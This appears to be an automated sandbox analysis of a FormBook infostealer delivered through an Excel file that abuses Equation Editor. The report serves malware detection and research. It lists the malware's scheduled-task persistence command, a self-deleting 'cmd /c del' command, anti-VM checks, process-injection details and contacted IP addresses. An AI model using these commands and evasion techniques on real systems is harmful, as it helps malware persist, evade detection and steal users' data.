          Source: 10.2.vbc.exe.400000.2.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 10.2.vbc.exe.400000.2.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: classification engineClassification label: mal100.troj.expl.evad.winXLSX@17/8@10/6
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\~$Doc_37584567499454.xlsxJump to behavior
          Source: C:\Users\Public\vbc.exeMutant created: \Sessions\1\BaseNamedObjects\bUeGxex
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRAB9.tmpJump to behavior
          Source: C:\Windows\SysWOW64\schtasks.exeConsole Write: ................@.&...............&.....(.P...............................................................................................-.....
          Source: C:\Users\Public\vbc.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
          Source: C:\Users\Public\vbc.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: Doc_37584567499454.xlsxReversingLabs: Detection: 23%
          Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
          Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
          Source: unknownProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
          Source: unknownProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\VqdYEvk' /XML 'C:\Users\user\AppData\Local\Temp\tmp4BF0.tmp'
          Source: unknownProcess created: C:\Users\Public\vbc.exe {path}
          Source: unknownProcess created: C:\Users\Public\vbc.exe {path}
          Source: unknownProcess created: C:\Users\Public\vbc.exe {path}
          Source: unknownProcess created: C:\Users\Public\vbc.exe {path}
          Source: unknownProcess created: C:\Windows\SysWOW64\cmstp.exe C:\Windows\SysWOW64\cmstp.exe
          Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\Public\vbc.exe'
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
          Source: C:\Users\Public\vbc.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\VqdYEvk' /XML 'C:\Users\user\AppData\Local\Temp\tmp4BF0.tmp'
          Source: C:\Users\Public\vbc.exeProcess created: C:\Users\Public\vbc.exe {path}
          Source: C:\Users\Public\vbc.exeProcess created: C:\Users\Public\vbc.exe {path}
          Source: C:\Users\Public\vbc.exeProcess created: C:\Users\Public\vbc.exe {path}
          Source: C:\Users\Public\vbc.exeProcess created: C:\Users\Public\vbc.exe {path}
          Source: C:\Windows\SysWOW64\cmstp.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\Public\vbc.exe'
          Source: C:\Users\Public\vbc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\InProcServer32
          Source: Window RecorderWindow detected: More than 3 window changes detected
          Source: C:\Users\Public\vbc.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
          Source: Doc_37584567499454.xlsxStatic file information: File size 2223104 > 1048576
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
          Source: Binary string: wntdll.pdb source: vbc.exe, cmstp.exe
          Source: Binary string: cmstp.pdb source: vbc.exe, 0000000A.00000002.2215893873.0000000000839000.00000004.00000020.sdmp
          Source: Doc_37584567499454.xlsxInitial sample: OLE indicators vbamacros = False
          Source: Doc_37584567499454.xlsxInitial sample: OLE indicators encrypted = True
          Source: C:\Users\Public\vbc.exeCode function: 4_2_000156A6 push esp; retf
          Source: C:\Users\Public\vbc.exeCode function: 4_2_002E949E pushad ; retf
          Source: C:\Users\Public\vbc.exeCode function: 4_2_005D5F5F pushad ; ret
          Source: C:\Users\Public\vbc.exeCode function: 4_2_04911097 push eax; retn 0027h
          Source: C:\Users\Public\vbc.exeCode function: 4_2_049112A1 push E9FFFFFFh; retf 0003h
          Source: C:\Users\Public\vbc.exeCode function: 4_2_049108DC pushfd ; ret
          Source: C:\Users\Public\vbc.exeCode function: 7_2_000156A6 push esp; retf
          Source: C:\Users\Public\vbc.exeCode function: 10_2_0041508E push ebp; iretd
          Source: C:\Users\Public\vbc.exeCode function: 10_2_0041C9C8 push dword ptr [ECF9F4C6h]; ret
          Source: C:\Users\Public\vbc.exeCode function: 10_2_0040C2CA push ds; retf
          Source: C:\Users\Public\vbc.exeCode function: 10_2_0040C31A push ds; retf
          Source: C:\Users\Public\vbc.exeCode function: 10_2_004153DF pushad ; ret
          Source: C:\Users\Public\vbc.exeCode function: 10_2_0041B3B5 push eax; ret
          Source: C:\Users\Public\vbc.exeCode function: 10_2_0041B46C push eax; ret
          Source: C:\Users\Public\vbc.exeCode function: 10_2_0041B402 push eax; ret
          Source: C:\Users\Public\vbc.exeCode function: 10_2_0041B40B push eax; ret
          Source: C:\Users\Public\vbc.exeCode function: 10_2_00414DDA pushfd ; retf
          Source: C:\Users\Public\vbc.exeCode function: 10_2_0040EEAA push esp; retf
          Source: C:\Users\Public\vbc.exeCode function: 10_2_0093DFA1 push ecx; ret
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 12_2_01F4DFA1 push ecx; ret
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 12_2_0010508E push ebp; iretd
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 12_2_000FC2CA push ds; retf
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 12_2_000FC31A push ds; retf
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 12_2_0010B3B5 push eax; ret
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 12_2_001053DF pushad ; ret
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 12_2_0010B402 push eax; ret
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 12_2_0010B40B push eax; ret
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 12_2_0010B46C push eax; ret
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 12_2_0010C9C8 push dword ptr [ECF9F4C6h]; ret
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 12_2_00104DDA pushfd ; retf
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 12_2_000FEEAA push esp; retf
          Source: initial sampleStatic PE information: section name: .text entropy: 7.35233596991
          Source: initial sampleStatic PE information: section name: .text entropy: 7.35233596991
          Source: initial sampleStatic PE information: section name: .text entropy: 7.35233596991
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\file2[1].exeJump to dropped file
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
          Source: C:\Users\Public\vbc.exeFile created: C:\Users\user\AppData\Roaming\VqdYEvk.exeJump to dropped file
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file

          Boot Survival:

          barindex
          Drops PE files to the user root directoryShow sources
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
          Uses schtasks.exe or at.exe to add and modify task schedulesShow sources
          Source: unknownProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\VqdYEvk' /XML 'C:\Users\user\AppData\Local\Temp\tmp4BF0.tmp'
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\cmstp.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: Doc_37584567499454.xlsxStream path 'EncryptedPackage' entropy: 7.99991238267 (max. 8.0)

          Malware Analysis System Evasion:

          barindex
          Yara detected AntiVM_3Show sources
          Source: Yara matchFile source: 00000004.00000002.2180582325.0000000002474000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: vbc.exe PID: 2716, type: MEMORY
          Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
          Source: vbc.exe, 00000004.00000002.2181185333.000000000273B000.00000004.00000001.sdmpBinary or memory string: WINE_GET_UNIX_FILE_NAME
          Source: vbc.exe, 00000004.00000002.2181185333.000000000273B000.00000004.00000001.sdmpBinary or memory string: WINE_GET_UNIX_FILE_NAME8
          Source: vbc.exe, 00000004.00000002.2181185333.000000000273B000.00000004.00000001.sdmpBinary or memory string: SBIEDLL.DLL
          Source: vbc.exe, 00000004.00000002.2181185333.000000000273B000.00000004.00000001.sdmpBinary or memory string: SBIEDLL.DLL8
          Tries to detect virtualization through RDTSC time measurementsShow sources
          Source: C:\Users\Public\vbc.exeRDTSC instruction interceptor: First address: 00000000004085E4 second address: 00000000004085EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\Public\vbc.exeRDTSC instruction interceptor: First address: 000000000040897E second address: 0000000000408984 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\cmstp.exeRDTSC instruction interceptor: First address: 00000000000F85E4 second address: 00000000000F85EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\cmstp.exeRDTSC instruction interceptor: First address: 00000000000F897E second address: 00000000000F8984 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\Public\vbc.exeCode function: 10_2_004088B0 rdtsc
          Source: C:\Users\Public\vbc.exeThread delayed: delay time: 922337203685477
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2548Thread sleep time: -360000s >= -30000s
          Source: C:\Users\Public\vbc.exe TID: 2760Thread sleep time: -31500s >= -30000s
          Source: C:\Users\Public\vbc.exe TID: 2944Thread sleep time: -60000s >= -30000s
          Source: C:\Users\Public\vbc.exe TID: 2780Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\explorer.exe TID: 2380Thread sleep time: -30000s >= -30000s
          Source: C:\Windows\SysWOW64\cmstp.exe TID: 1756Thread sleep time: -36000s >= -30000s
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\cmstp.exeLast function: Thread delayed
          Source: vbc.exe, 00000004.00000002.2181185333.000000000273B000.00000004.00000001.sdmpBinary or memory string: VMware
          Source: vbc.exe, 00000004.00000002.2181185333.000000000273B000.00000004.00000001.sdmpBinary or memory string: VMWARE8
          Source: explorer.exe, 0000000B.00000002.2381072521.00000000001F5000.00000004.00000020.sdmpBinary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 0000000B.00000000.2188908052.0000000004234000.00000004.00000001.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&22BE343F&0&000000
          Source: vbc.exe, 00000004.00000002.2181185333.000000000273B000.00000004.00000001.sdmpBinary or memory string: VMwareHD6m
          Source: explorer.exe, 0000000B.00000000.2188935970.0000000004263000.00000004.00000001.sdmpBinary or memory string: \\?\ide#cdromnecvmwar_vmware_sata_cd01_______________1.00____#6&373888b8&0&1.0.0#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}ies
          Source: vbc.exe, 00000004.00000002.2181185333.000000000273B000.00000004.00000001.sdmpBinary or memory string: VMware SVGA II8
          Source: vbc.exe, 00000004.00000002.2179777890.00000000006AC000.00000004.00000020.sdmpBinary or memory string: VMware_S
          Source: vbc.exe, 00000004.00000002.2181185333.000000000273B000.00000004.00000001.sdmpBinary or memory string: QEMU8
          Source: explorer.exe, 0000000B.00000000.2188908052.0000000004234000.00000004.00000001.sdmpBinary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0
          Source: vbc.exe, 00000004.00000002.2181185333.000000000273B000.00000004.00000001.sdmpBinary or memory string: VMware HD6m
          Source: vbc.exe, 00000004.00000002.2179858583.000000000074B000.00000004.00000020.sdmpBinary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
          Source: vbc.exe, 00000004.00000002.2181185333.000000000273B000.00000004.00000001.sdmpBinary or memory string: VMWARE
          Source: vbc.exe, 00000004.00000002.2181185333.000000000273B000.00000004.00000001.sdmpBinary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
          Source: vbc.exe, 00000004.00000002.2181185333.000000000273B000.00000004.00000001.sdmpBinary or memory string: 5m"SOFTWARE\VMware, Inc.\VMware Tools8
          Source: vbc.exe, 00000004.00000002.2181185333.000000000273B000.00000004.00000001.sdmpBinary or memory string: VMware
          Source: vbc.exe, 00000004.00000002.2181185333.000000000273B000.00000004.00000001.sdmpBinary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
          Source: vbc.exe, 00000004.00000002.2181185333.000000000273B000.00000004.00000001.sdmpBinary or memory string: VMware SVGA II
          Source: vbc.exe, 00000004.00000002.2181185333.000000000273B000.00000004.00000001.sdmpBinary or memory string: 5m%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\8
          Source: vbc.exe, 00000004.00000002.2181185333.000000000273B000.00000004.00000001.sdmpBinary or memory string: vmwareNSYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
          Source: explorer.exe, 0000000B.00000002.2381106574.0000000000231000.00000004.00000020.sdmpBinary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0&E}
          Source: vbc.exe, 00000004.00000002.2181185333.000000000273B000.00000004.00000001.sdmpBinary or memory string: vmware8
          Source: vbc.exe, 00000004.00000002.2181185333.000000000273B000.00000004.00000001.sdmpBinary or memory string: VMWAREHD6m
          Source: C:\Users\Public\vbc.exeProcess information queried: ProcessInformation
          Source: C:\Users\Public\vbc.exeProcess queried: DebugPort
          Source: C:\Windows\SysWOW64\cmstp.exeProcess queried: DebugPort
          Source: C:\Users\Public\vbc.exeCode function: 10_2_004088B0 rdtsc
          Source: C:\Users\Public\vbc.exeCode function: 10_2_00409B20 LdrLoadDll,
          Source: C:\Users\Public\vbc.exeCode function: 10_2_00920080 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\Public\vbc.exeCode function: 10_2_009200EA mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\vbc.exeCode function: 10_2_009426F8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 12_2_01F526F8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\vbc.exeProcess token adjusted: Debug
          Source: C:\Users\Public\vbc.exeProcess token adjusted: Debug
          Source: C:\Windows\SysWOW64\cmstp.exeProcess token adjusted: Debug
          Source: C:\Users\Public\vbc.exeMemory allocated: page read and write | page guard

          HIPS / PFW / Operating System Protection Evasion:

          barindex
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\explorer.exeNetwork Connect: 100.24.208.97 80
          Source: C:\Windows\explorer.exeNetwork Connect: 52.209.107.24 80
          Source: C:\Windows\explorer.exeNetwork Connect: 23.105.124.225 80
          Source: C:\Windows\explorer.exeNetwork Connect: 198.185.159.144 80
          Source: C:\Windows\explorer.exeNetwork Connect: 34.102.136.180 80
          Injects a PE file into a foreign processesShow sources
          Source: C:\Users\Public\vbc.exeMemory written: C:\Users\Public\vbc.exe base: 400000 value starts with: 4D5A
          Maps a DLL or memory area into another processShow sources
          Source: C:\Users\Public\vbc.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\Public\vbc.exeSection loaded: unknown target: C:\Windows\SysWOW64\cmstp.exe protection: execute and read and write
          Source: C:\Users\Public\vbc.exeSection loaded: unknown target: C:\Windows\SysWOW64\cmstp.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\cmstp.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\cmstp.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Modifies the context of a thread in another process (thread injection)Show sources
          Source: C:\Users\Public\vbc.exeThread register set: target process: 1388
          Source: C:\Windows\SysWOW64\cmstp.exeThread register set: target process: 1388
          Queues an APC in another process (thread injection)Show sources
          Source: C:\Users\Public\vbc.exeThread APC queued: target process: C:\Windows\explorer.exe
          Sample uses process hollowing techniqueShow sources
          Source: C:\Users\Public\vbc.exeSection unmapped: C:\Windows\SysWOW64\cmstp.exe base address: B00000
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
          Source: C:\Users\Public\vbc.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\VqdYEvk' /XML 'C:\Users\user\AppData\Local\Temp\tmp4BF0.tmp'
          Source: C:\Users\Public\vbc.exeProcess created: C:\Users\Public\vbc.exe {path}
          Source: C:\Users\Public\vbc.exeProcess created: C:\Users\Public\vbc.exe {path}
          Source: C:\Users\Public\vbc.exeProcess created: C:\Users\Public\vbc.exe {path}
          Source: C:\Users\Public\vbc.exeProcess created: C:\Users\Public\vbc.exe {path}
          Source: C:\Windows\SysWOW64\cmstp.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\Public\vbc.exe'
          Source: explorer.exe, 0000000B.00000002.2381223379.00000000006F0000.00000002.00000001.sdmpBinary or memory string: Program Manager
          Source: explorer.exe, 0000000B.00000002.2381223379.00000000006F0000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 0000000B.00000002.2381072521.00000000001F5000.00000004.00000020.sdmpBinary or memory string: Progman
          Source: explorer.exe, 0000000B.00000002.2381223379.00000000006F0000.00000002.00000001.sdmpBinary or memory string: !Progman
          Source: C:\Users\Public\vbc.exeQueries volume information: C:\Users\Public\vbc.exe VolumeInformation
          Source: C:\Users\Public\vbc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

          Stealing of Sensitive Information:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 0000000C.00000002.2381241064.00000000008D0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000C.00000002.2381206154.00000000007E0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.2214101958.0000000000350000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000C.00000002.2380915996.00000000000F0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.2214932828.00000000003A0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.2215758814.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.2181703532.0000000003D49000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 10.2.vbc.exe.400000.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.2.vbc.exe.400000.2.raw.unpack, type: UNPACKEDPE

          Remote Access Functionality:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 0000000C.00000002.2381241064.00000000008D0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000C.00000002.2381206154.00000000007E0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.2214101958.0000000000350000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000C.00000002.2380915996.00000000000F0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.2214932828.00000000003A0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.2215758814.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.2181703532.0000000003D49000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 10.2.vbc.exe.400000.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.2.vbc.exe.400000.2.raw.unpack, type: UNPACKEDPE

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid AccountsCommand and Scripting Interpreter1Scheduled Task/Job1Process Injection612Masquerading111OS Credential DumpingSecurity Software Discovery221Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
          Default AccountsScheduled Task/Job1Boot or Logon Initialization ScriptsScheduled Task/Job1Virtualization/Sandbox Evasion3LSASS MemoryVirtualization/Sandbox Evasion3Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothIngress Tool Transfer4Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsShared Modules1Logon Script (Windows)Logon Script (Windows)Disable or Modify Tools1Security Account ManagerProcess Discovery2SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsExploitation for Client Execution13Logon Script (Mac)Logon Script (Mac)Process Injection612NTDSRemote System Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol13SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptDeobfuscate/Decode Files or Information1LSA SecretsFile and Directory Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.commonObfuscated Files or Information41Cached Domain CredentialsSystem Information Discovery113VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup ItemsSoftware Packing2DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
